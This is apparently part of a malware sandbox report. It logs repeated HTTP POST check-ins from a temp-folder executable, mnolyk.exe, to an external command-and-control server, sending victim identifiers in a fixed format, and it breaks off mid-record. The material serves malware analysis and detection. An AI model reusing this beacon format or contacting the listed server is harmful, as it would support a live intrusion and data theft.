                            Feb 8, 2023 17:38:17.239443064 CET | 362 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.306087017 CET | 362 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            174 | 192.168.2.4 | 49869 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:17.481259108 CET | 363 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.546847105 CET | 363 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            175 | 192.168.2.4 | 49870 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:17.723084927 CET | 364 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.788021088 CET | 364 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            176 | 192.168.2.4 | 49871 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:17.959790945 CET | 365 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.023653030 CET | 365 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            177 | 192.168.2.4 | 49872 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:18.196908951 CET | 366 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.262782097 CET | 366 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            178 | 192.168.2.4 | 49873 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:18.447657108 CET | 367 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.512018919 CET | 367 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            179 | 192.168.2.4 | 49874 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:18.694725037 CET | 368 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.757941008 CET | 368 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            18 | 192.168.2.4 | 49713 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:28.821552038 CET | 207 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.884332895 CET | 207 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            180 | 192.168.2.4 | 49875 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:18.930671930 CET | 369 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:18.994806051 CET | 369 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            181 | 192.168.2.4 | 49876 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:19.187751055 CET | 370 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.253103018 CET | 370 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            182 | 192.168.2.4 | 49877 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:19.428226948 CET | 371 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.490499973 CET | 371 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            183 | 192.168.2.4 | 49878 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:19.667671919 CET | 372 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.732453108 CET | 372 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            184 | 192.168.2.4 | 49879 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:19.911855936 CET | 373 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:19.976509094 CET | 373 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            185 | 192.168.2.4 | 49880 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:20.163284063 CET | 374 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.230844021 CET | 374 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            186 | 192.168.2.4 | 49881 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:20.412226915 CET | 375 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.477679968 CET | 375 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            187 | 192.168.2.4 | 49882 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:20.650207996 CET | 376 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.713953972 CET | 376 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            188 | 192.168.2.4 | 49883 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:20.884072065 CET | 377 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:20.950083017 CET | 377 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            189 | 192.168.2.4 | 49884 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:21.133805990 CET | 378 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.201188087 CET | 378 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            19 | 192.168.2.4 | 49714 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:29.062381983 CET | 208 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.129106998 CET | 208 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            190 | 192.168.2.4 | 49885 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:21.385215044 CET | 379 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.446939945 CET | 379 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            191 | 192.168.2.4 | 49886 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:21.612683058 CET | 380 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
